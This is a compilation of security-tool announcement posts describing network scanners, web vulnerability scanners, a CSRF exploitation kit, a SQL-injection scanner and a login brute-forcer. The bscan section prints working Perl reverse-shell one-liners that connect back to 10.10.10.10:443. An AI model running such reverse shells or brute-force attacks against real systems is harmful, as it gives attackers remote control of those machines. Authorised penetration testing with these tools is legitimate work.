Goscan – Interactive Network Scanner

GoScan is an interactive network scanner client, featuring auto-completion, which provides abstraction and automation over nmap.Although it started as a small side-project I developed in order to learn @golang, GoScan can now be used to perform host discovery, port scanning, and service enumeration not only in situations where being stealthy is not a priority and time is limited (think at CTFs, OSCP, exams, etc.), but also (with a few tweaks in its configuration) during professional engagements.GoScan is also particularly suited for unstable environments (think unreliable network connectivity, lack of “screen", etc.), given that it fires scans and maintain their state in an SQLite database. Scans run in the background (detached from the main thread), so even if connection to the box running GoScan is lost, results can be uploaded asynchronously (more on this below). That is, data can be imported into GoScan at different stages of the process, without the need to restart the entire process from scratch if something goes wrong.In addition, the Service Enumeration phase integrates a collection of other tools (e.g., EyeWitness, Hydra, nikto, etc.), each one tailored to target a specific service. InstallationBinary installation (Recommended)Binaries are available from the Release page.# Linux (64bit)$ wget https://github.com/marco-lancini/goscan/releases/download/v2.1/goscan_2.1_linux_amd64.zip$ unzip goscan_2.1_linux_amd64.zip# Linux (32bit)$ wget https://github.com/marco-lancini/goscan/releases/download/v2.1/goscan_2.1_linux_386.zip$ unzip goscan_2.1_linux_386.zip# After that, place the executable in your PATH$ chmod +x goscan$ sudo mv ./goscan /usr/local/bin/goscanBuild from source$ git clone https://github.com/marco-lancini/goscan.git$ cd goscan/goscan/$ make setup$ make buildTo create a multi-platform binary, use the cross command via make:$ make crossDocker$ git clone https://github.com/marco-lancini/goscan.git$ cd goscan/$ docker-compose up –buildUsageGoScan supports all the main steps of network enumeration: Step Commands 1. Load targets Add a single target via the CLI (must be a /32): load target SINGLE Upload multiple targets from a text file or folder: load target MULTI <path-to-file> 2. Host Discovery Perform a Ping Sweep: sweep <TYPE> <TARGET>Or load results from a previous discovery:Add a single alive host via the CLI (must be a /32): load alive SINGLE <IP>Upload multiple alive hosts from a text file or folder: load alive MULTI <path-to-file> 3. Port Scanning Perform a port scan: portscan <TYPE> <TARGET>Or upload nmap results from XML files or folder: load portscan <path-to-file> 4. Service Enumeration Dry Run (only show commands, without performing them): enumerate <TYPE> DRY <TARGET>Perform enumeration of detected services: enumerate <TYPE> <POLITE/AGGRESSIVE> <TARGET> 5. Special Scans EyeWitnessTake screenshots of websites, RDP services, and open VNC servers (KALI ONLY): special eyewitnessEyeWitness.py needs to be in the system pathExtract (Windows) domain information from enumeration dataspecial domain <users/hosts/servers>DNSEnumerate DNS (nmap, dnsrecon, dnsenum): special dns DISCOVERY <domain>Bruteforce DNS: special dns BRUTEFORCE <domain>Reverse Bruteforce DNS: special dns BRUTEFORCE_REVERSE <domain> <base_IP> Utils Show results: show <targets/hosts/portsChange the output folder (by default ~/goscan): set output_folder <PATH>Modify the default nmap switches: set nmap_switches <SWEEP/TCP_FULL/TCP_STANDARD/TCP_VULN/UDP_STANDARD> <SWITCHES>Modify the default wordlists: set_wordlists <FINGER_USER/FTP_USER/…> <PATH> External IntegrationsThe Service Enumeration phase currently supports the following integrations: WHAT INTEGRATION ARP nmap DNS nmapdnsrecondnsenumhost FINGER nmapfinger-user-enum FTP nmapftp-user-enumhydra [AGGRESSIVE] HTTP nmapniktodirbEyeWitnesssqlmap [AGGRESSIVE]fimap [AGGRESSIVE] RDP nmapEyeWitness SMB nmapenum4linuxnbtscansamrdump SMTP nmapsmtp-user-enum SNMP nmapsnmpcheckonesixtyonesnmpwalk SSH hydra [AGGRESSIVE] SQL nmap VNC EyeWitness Download Goscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/uz1Ra9_76sE/goscan-interactive-network-scanner.html

Bscan – An Asynchronous Target Enumeration Tool

Synopsisbscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.Installationbscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.Download the latest packaged version from PyPI:pip install bscanOr get the bleeding-edge version from version control:pip install https://github.com/welchbj/bscan/archive/master.tar.gzBasic Usagebscan has a wide variety of configuration options which can be used to tune scans to your needs. Here’s a quick example:$ bscan \> –max-concurrency 3 \> –patterns [Mm]icrosoft \> –status-interval 10 \> –verbose-status \> scanme.nmap.orgWhat’s going on here?–max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time–patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output–status-interval 10 tells bscan to print runtime status updates every 10 seconds–verbose-status means that each of these status updates will print details of all currently-running scan subprocessesscanme.nmap.org is the host upon which we want to enumeratebscan also relies on some additional configuration files. The default files can be found in the bscan/configuation directory and serve the following purposes:patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan outputrequired-programs.txt specifies the installed programs that bscan plans on usingport-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan outputservice-scans.toml defines the scans be run on the target(s) on a per-service basisDetailed OptionsHere’s what you should see when running bscan –help:usage: bscan [OPTIONS] targets _| |__ ___ ___ __ _ _ __| ‘_ \/ __|/ __/ _` | ‘_ \| |_) \__ \ (__ (_| | | | ||_.__/|___/\___\__,_|_| |_|an asynchronous service enumeration toolpositional arguments: targets the targets and/or networks on which to perform enumerationoptional arguments: -h, –help show this help message and exit –brute-pass-list F filename of password list to use for brute-forcing –brute-user-list F filename of user list to use for brute-forcing –cmd-print-width I the maximum integer number of characters allowed when printing the command used to spawn a running subprocess (defaults to 80) –config-dir D the base directory from which to load the configuration files; required configuration files missing from this directory will instead be loaded from the default files shipped with this program –hard force overwrite of existing directories –max-concurrency I maximum integer number of subprocesses permitted to be running concurrently (defaults to 20) –no-program-check disable checking the presence of required system programs –no-file-check disable checking the presence of files such as configured wordlists –no-service-scans disable running scans on discovered services –output-dir D the base directory in which to write output files –patterns [ [ …]] regex patterns to highlight in output text –ping-sweep enable ping sweep filtering of hosts from a network range before running more intensive scans –quick-only whether to only run the quick scan (and not include the thorough scan over all ports) –qs-method S the method for performing the initial TCP port scan; must correspond to a configured port scan –status-interval I integer number of seconds to pause in between printing status updates; a non-positive value disables updates (defaults to 30) –ts-method S the method for performing the thorough TCP port scan; must correspond to a configured port scan –udp whether to run UDP scans –udp-method S the method for performing the UDP port scan; must correspond to a configured port scan –verbose-status whether to print verbose runtime status updates, based on frequency specified by `–status-interval` flag –version program version –web-word-list F the wordlist to use for scansCompanion ToolsThe main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here’s a simple example:$ bscan-wordlists –find “*win*"/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt/usr/share/wordlists/metasploit/sensitive_files_win.txt/usr/share/seclists/Passwords/common-passwords-win.txtTry bscan-wordlists –help to explore other options.bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here’s a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:$ bscan-shells –port 443 10.10.10.10 | grep -i -A1 perlperl for windowsperl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’perl with /bin/shperl -e ‘use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’perl without /bin/shperl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells –help to explore other options.DevelopmentStart by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):# setup the environmentmkvirtualenv -p $(which python3) bscan-devworkon bscan-dev# get the depspip install -r dev-requirements.txtLint and type-check the project (these are run on Travis, too):flake8 . && mypy bscanWhen it’s time to package a new release:# build source and wheel distributionspython setup.py bdist_wheel sdist# run post-build checkstwine check dist/*# upload to PyPItwine upload dist/*Download Bscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/nmAEkhGVeYk/bscan-asynchronous-target-enumeration.html

Fierce – Semi-Lightweight Scanner That Helps Locate Non-Contiguous IP Space And Hostnames Against Specified Domains

Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains.It’s really meant as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all of those require that you already know what IP space you are looking for.This does not perform exploitation and does not scan the whole internet indiscriminately. It is meant specifically to locate likely targets both inside and outside a corporate network.Because it uses DNS primarily you will often find mis-configured networks that leak internal address space. That’s especially useful in targeted malware.Options:-connect Attempt to make http connections to any non RFC1918 (public) addresses. This will output the return headers but be warned, this could take a long time against a company with many targets, depending on network/machine lag. I wouldn’t recommend doing this unless it’s a small company or you have a lot of free time on your hands (could take hours-days). Inside the file specified the text “Host:\n" will be replaced by the host specified. Usage:perl fierce.pl -dns example.com -connect headers.txt-delay The number of seconds to wait between lookups.-dns The domain you would like scanned.-dnsfile Use DNS servers provided by a file (one per line) for reverse lookups (brute force).-dnsserver Use a particular DNS server for reverse lookups (probably should be the DNS server of the target). Fierce uses your DNS server for the initial SOA query and then uses the target’s DNS server for all additional queries by default.-file A file you would like to output to be logged to.-fulloutput When combined with -connect this will output everything the webserver sends back, not just the HTTP headers.-help This screen.-nopattern Don’t use a search pattern when looking for nearby hosts. Instead dump everything. This is really noisy but is useful for finding other domains that spammers might be using. It will also give you lots of false positives, especially on large domains.-range Scan an internal IP range (must be combined with -dnsserver). Note, that this does not support a pattern and will simply output anything it finds. Usage:perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co-search Search list. When fierce attempts to traverse up and down ipspace it may encounter other servers within other domains that may belong to the same company. If you supply a comma delimited list to fierce it will report anything found. This is especially useful if the corporate servers are named different from the public facing website. Usage:perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany Note that using search could also greatly expand the number of hosts found, as it will continue to traverse once it locates servers that you specified in your search list. The more the better.-suppress Suppress all TTY output (when combined with -file).-tcptimeout Specify a different timeout (default 10 seconds). You may want to increase this if the DNS server you are querying is slow or has a lot of network lag.-threads Specify how many threads to use while scanning (default is single threaded).-traverse Specify a number of IPs above and below whatever IP you have found to look for nearby IPs. Default is 5 above and below. Traverse will not move into other C blocks.-version Output the version number.-wide Scan the entire class C after finding any matching hostnames in that class C. This generates a lot more traffic but can uncover a lot more information.-wordlist Use a seperate wordlist (one word per line). Usage:perl fierce.pl -dns examplecompany.com -wordlist dictionary.txtfierce Usage Exampleroot@kali:~# fierce -dns example.com DNS Servers for example.com: b.iana-servers.net a.iana-servers.netTrying zone transfer first…Testing b.iana-servers.net Request timed out or transfer not allowed.Testing a.iana-servers.net Request timed out or transfer not allowed.Unsuccessful in zone transfer (it was worth a shot)Okay, trying the good old fashioned way… brute forceChecking for wildcard DNS…Nope. Good.Now performing 2280 test(s)…Download Fierce-Domain-Scanner

Link: http://feedproxy.google.com/~r/PentestTools/~3/X8Fc7tY8OFI/fierce-semi-lightweight-scanner-that.html

Scanner-Cli – A Project Security/Vulnerability/Risk Scanning Tool

The Hawkeye scanner-cli is a project security, vulnerability and general risk highlighting tool. It is meant to be integrated into your pre-commit hooks and your pipelines.Running and configuring the scannerThe Hawkeye scanner-cli assumes that your directory structure is such that it keeps the toolchain’s files on top level. Roughly, this is what it boils down to:Node.js projects have a package.json on top levelRuby projects will have a Gemfile on top levelPython projects will have a requirements.txt on top levelPHP projects will have a composer.lock on top levelJava projects will have a build (gradle) or target (maven) folder, and include .java and .jar filesThis is not exhaustive as sometimes tools require further files to exist. To understand how the modules decide whether they can handle a project, please check the How it works section and the modules folder.Docker (recommended)The docker image is hands-down the easiest way to the scanner. Please note that your project root (e.g. $PWD) needs to be mounted to /target.docker run –rm -v $PWD:/target hawkeyesec/scanner-cliThe docker build is also the recommended way to run the scanner in your CI pipelines. This is an example of running Hawkeye against one of your projects in GoCD:

Link: http://feedproxy.google.com/~r/PentestTools/~3/JoL8_BBnrhQ/scanner-cli-project-securityvulnerabili.html

Htcap – A Web Application Scanner Able To Crawl Single Page Application (SPA) In A Recursive Manner By Intercepting Ajax Calls And DOM Changes

Htcap is a web application scanner able to crawl single page application (SPA) in a recursive manner by intercepting ajax calls and DOM changes. Htcap is not just another vulnerability scanner since it’s focused on the crawling process and it’s aimed to detect and intercept ajax/fetch calls, websockets, jsonp ecc. It uses its own fuzzers plus a set of external tools to discover vulnerabilities and it’s designed to be a tool for both manual and automated penetration test of modern web applications.It also features a small but powerful framework to quickly develop custom fuzzers with less than 60 lines of python. The fuzzers can work with GET/POST data, XML and JSON payloads and switch between POST and GET. Of course, fuzzers run in parallel in a multi-threaded environment.This is the very first release that uses headless chrome instead of phantomjs. Htcap’s Javascript crawling engine has been rewritten to take advantage of the new async/await features of ecmascript and has been converted to a nodjes module build on top of Puppetteer.More infos at htcap.org.SETUPRequirementsPython 2.7Nodejs and npmSqlmap (for sqlmap scanner module)Arachni (for arachni scanner module)Download and Run$ git clone https://github.com/fcavallarin/htcap.git htcap$ htcap/htcap.pyVIDEODOCUMENTATIONDocumentation, examples and demos can be found at the official website https://htcap.org.Download Htcap

Link: http://feedproxy.google.com/~r/PentestTools/~3/aJgXuqnKFus/htcap-web-application-scanner-able-to.html

Sitadel – Web Application Security Scanner

Sitadel is basically an update for WAScan making it compatible for python >= 3.4 It allows more flexibility for you to write new modules and implement new features :Frontend framework detectionContent Delivery Network detectionDefine Risk Level to allow for scansPlugin systemDocker image available to build and runInstallation$ git clone https://github.com/shenril/Sitadel.git$ cd Sitadel$ pip install .$ python sitadel.py –helpFeaturesFingerprints ServerWeb Frameworks (CakePHP,CherryPy,…)Frontend Frameworks (AngularJS,MeteorJS,VueJS,…)Web Application Firewall (Waf)Content Management System (CMS)Operating System (Linux,Unix,..)Language (PHP,Ruby,…)Cookie SecurityContent Delivery Networks (CDN)Attacks: Bruteforce Admin InterfaceCommon BackdoorsCommon Backup DirectoryCommon Backup FileCommon DirectoryCommon FileLog FileInjection HTML InjectionSQL InjectionLDAP InjectionXPath InjectionCross Site Scripting (XSS)Remote File Inclusion (RFI)PHP Code InjectionOther HTTP Allow MethodsHTML ObjectMultiple IndexRobots PathsWeb DavCross Site Tracing (XST)PHPINFO.ListingVulnerabilities ShellShockAnonymous Cipher (CVE-2007-1858)Crime (SPDY) (CVE-2012-4929)Struts-ShockExampleSimple runpython sitadel http://website.com Run with risk level at DANGEROUS and do not follow redirectionspython sitadel http://website.com -r 2 –no-redirectRun specifics modules only and full verbositypython sitadel http://website.com -a admin backdoor -f header server -vvvRun with dockerdocker build -t sitadel .docker run sitadel http://example.comDownload Sitadel

Link: http://feedproxy.google.com/~r/PentestTools/~3/zfPWuXefLsw/sitadel-web-application-security-scanner.html

XSRFProbe – The Prime Cross Site Request Forgery Audit And Exploitation Toolkit

XSRFProbe is an advanced Cross Site Request Forgery (CSRF/XSRF) Audit and Exploitation Toolkit. Equipped with a Powerful Crawling Engine and Numerous Systematic Checks, it is now able to detect most cases of CSRF vulnerabilities, their related bypasses and futher generate (maliciously) exploitable proof of concepts with each found vulnerability. For more info on how XSRFProbe works, see XSRFProbe Internals on wiki.Some Features:Performs several types of checks before declaring an endpoint as vulnerable.Can detect several types of Anti-CSRF tokens in POST requests.Features a powerful crawler which features continuous crawling and scanning.Out of the box support for custom cookie values and generic headers.Accurate Token-Strength Detection and Analysis using various algorithms.Can generate both normal as well as maliciously exploitable CSRF PoCs.Follows a redirect when there is a 30x response.Well documented code and highly generalised automated workflow.The user is in control of everything whatever the scanner does.Has a user-friendly interaction environment with full verbose support.Detailed logging system of errors, vulnerabilities, tokens and other stuffs.Gallery:Lets see some real-world scenarios of XSRFProbe in action:Warnings:Do not use this tool on a live site!It is because this tool is designed to perform all kinds of form submissions automatically which can sabotage the site. Sometimes you may screw up the database and most probably perform a DoS on the site as well.Test on a disposable/dummy setup/site!Disclaimer:Usage of XSRFProbe for testing websites without prior mutual consistency can be considered as an illegal activity. It is the final user’s responsibility to obey all applicable local, state and federal laws. The author assumes no liability and is not exclusively responsible for any misuse or damage caused by this program.Author’s Words:This project is based entirely upon my own research and my own experience with web applications on Cross-Site Request Forgery attacks. You can try going through the source code which is highly documented to help you understand how this toolkit was built. Useful pull requests, ideas and issues are highly welcome. If you wish to see what how XSRFProbe is being developed, check out the Development Board.Thats it folks. Thank you…Copyright © Infected DrakeDownload XSRFProbe

Link: http://feedproxy.google.com/~r/PentestTools/~3/vfUYJMB8ObI/xsrfprobe-prime-cross-site-request.html

SQLiScanner – Automatic SQL Injection With Charles And Sqlmap API

Automatic SQL injection with Charles and sqlmapapiDependenciesDjangoPostgreSQLCelerysqlmapredisSupported platformsLinuxosxInstallationPreferably, you can download SQLiScanner by cloning the Git repository:git clone https://github.com/0xbug/SQLiScanner.git –depth 1You can download sqlmap by cloning the Git repository:git clone https://github.com/sqlmapproject/sqlmap.git –depth 1SQLiScanner works with Python version 3.x on Linux and osx.Create virtualenv and install requirementscd SQLiScanner/virtualenv –python=/usr/local/bin/python3.5 venvsource venv/bin/activatepip install -r requirements.txtSettingDATABASES SettingSQLiScanner/settings.py:85DATABASES = { ‘default’: { ‘ENGINE’: ‘django.db.backends.postgresql’, ‘NAME’: ”, ‘USER’: ”, ‘PASSWORD’: ”, ‘HOST’: ‘127.0.0.1’, ‘PORT’: ‘5432’, }}SendEmail SettingSQLiScanner/settings.py:158# EmailEMAIL_BACKEND = ‘django.core.mail.backends.smtp.EmailBackend’EMAIL_USE_TLS = FalseEMAIL_HOST = ”EMAIL_PORT = 25EMAIL_HOST_USER = ”EMAIL_HOST_PASSWORD = ”DEFAULT_FROM_EMAIL = ”scanner/tasks.py:14class SqlScanTask(object): def __init__(self, sqli_obj): self.api_url = “http://127.0.0.1:8775" self.mail_from = "" self.mail_to = [""]Syncdbpython manage.py makemigrations scannerpython manage.py migrateCreate superuserpython manage.py createsuperuserRunredis-serverpython sqlmapapi.py -s -p 8775python manage.py celery worker –loglevel=infopython manage.py runserverDownload SQLiScanner

Link: http://www.kitploit.com/2018/12/sqliscanner-automatic-sql-injection.html

W3Brute – Automatic Web Application Brute Force Attack Tool

w3brute is an open source penetration testing tool that automates attacks directly to the website’s login page. w3brute is also supported for carrying out brute force attacks on all websites.FeaturesScanner:w3brute has a scanner feature that serves to support the bruteforce attack process. this is a list of available scanners:automatically detects target authentication type.admin page scanner.SQL injection scanner vulnerability.Attack Method:w3brute can attack using various methods of attack. this is a list of available attack methods:SQL injection bypass authenticationmixed credentials (username + SQL injection queries)Support:multiple target google dorking a list of supported web interface types to attack: web shellHTTP 401 UNAUTHORIZED (Basic and Digest)create file results brute force attack. supported file format type: CSV (default)HTMLSQLITE3custom credentials (username, password, domain) (supported zip file) custom HTTP requests (User-Agent, timeout, etc) and much more…InstallationYou can download the latest version of the tarball file here or zipball here. If you have installed the git package, you can clone the Git repository in a way, as below:git clone https://github.com/aprilahijriyan/w3brute.gitw3brute can be run with Python version 2.6.x or 2.7.x on all platforms.UsageTo get all list of options on w3brute tool:python w3brute.py -hExamples:# basic usage$ python w3brute.py -t http://www.example.com/admin/login.php# look for the admin page$ python w3brute.py -t http://www.example.com/ –admin# uses a password file zip list. (syntax => <;filename>[:password])$ python w3brute.py -t http://www.example.com/ –admin -u admin -p /path/to/file.zip;filename.txt # (if the file is encrypted: /path/to/file.zip;filename.txt:password)# slice the password from the list. (syntax => <start>[:stop][:step])$ python w3brute.py -t http://www.example.com/ –admin -u admin -sP 20000VideoLinksDownload: .tar.gz or .zipIssue tracker: https://github.com/aprilahijriyan/w3brute/issuesDownload W3Brute

Link: http://www.kitploit.com/2018/12/w3brute-automatic-web-application-brute.html

Jackhammer – One Security Vulnerability Assessment/Management Tool To Solve All The Security Team Problems

One Security vulnerability assessment/management tool to solve all the security team problems.What is Jackhammer?Jackhammer is a collaboration tool built with an aim of bridging the gap between Security team vs dev team, QA team and being a facilitator for TPM to understand and track the quality of the code going into production. It could do static code analysis and dynamic analysis with inbuilt vulnerability management capability. It finds security vulnerabilities in the target applications and it helps security teams to manage the chaos in this new age of continuous integration and continuous/multiple deployments.It completely works on RBAC (Role Based Access Control). There are cool dashboards for individual scans and team scans giving ample flexibility to collaborate with different teams. It is totally built on pluggable architecture which can be integrated with any open source/commercial tool.Jackhammer uses the OWASP pipeline project to run multiple open source and commercial tools against your code,web app, mobile app, cms (wordpress), network.Key Features:Provides unified interface to collaborate on findingsScanning (code) can be done for all code management repositoriesScheduling of scans based on intervals # daily, weekly, monthlyAdvanced false positive filteringPublish vulnerabilities to bug tracking systemsKeep a tab on statistics and vulnerability trends in your applicationsIntegrates with majority of open source and commercial scanning toolsUsers and Roles management giving greater controlConfigurable severity levels on list of findings across the applicationsBuilt-in vulnerability status progressionEasy to use filters to review targeted sets from tons of vulnerabilitiesAsynchronous scanning (via sidekiq) that scaleSeamless Vulnerability ManagementTrack statistics and graph security trends in your applicationsEasily integrates with a variety of open source, commercial and custom scanning toolsSupported Vulnerability Scanners:Static Analysis:BrakemanBundler-AuditCheckmarx**DawnscannerFindSecurityBugsXanitizer*NodeSecurityProjectPMDRetire.js   * license required      ** commercial license requiredFinding hard coded secrets/tokens/creds:Trufflehog (Slightly modified/extended for better result and integration as of May 2017)Webapp:ArachniMobile App:Androbugs (Slightly modified/extended for better result and integration as of May 2017)Androguard (Slightly modified/extended for better result and integration as of May 2017)Wordpress:WPScan (Slightly modified/extended for better result and integration as of May 2017)Network:NmapAdding Custom (other open source/commercial /personal) Scanners:You can add any scanner to jackhammer within 10-30 minutes. Check the links/video Quick Start and InstallationSee our Quick Start/Installation Guide if you want to try out Jackhammer as quickly as possible using Docker Compose.Run the following commands for local setup (corporate mode): git clone https://github.com/olacabs/jackhammer sh ./docker-build.shDefault credentials for local setup:username: jackhammer@olacabs.compassword: j4ckh4mm3r(For single user mode)sh ./docker-build.sh SingleUserdo signup for accessRestarting Jackhammerdocker-compose stopdocker-compose rmdocker-compose up -dUser GuideThe User Guide will give you an overview of how to use Jackhammer once you have things up and running.DemoDemo Environment Link:https://jch.olacabs.com/Default credentials:username: admin@admin.compassword: admin@admin.comCreditsSentinels Team @OlaShout-out to:-Madhu-Habi-Krishna-Shreyas-Krutarth-Naveen-MohanDownload Jackhammer

Link: http://feedproxy.google.com/~r/PentestTools/~3/n25aLXiISAg/jackhammer-one-security-vulnerability.html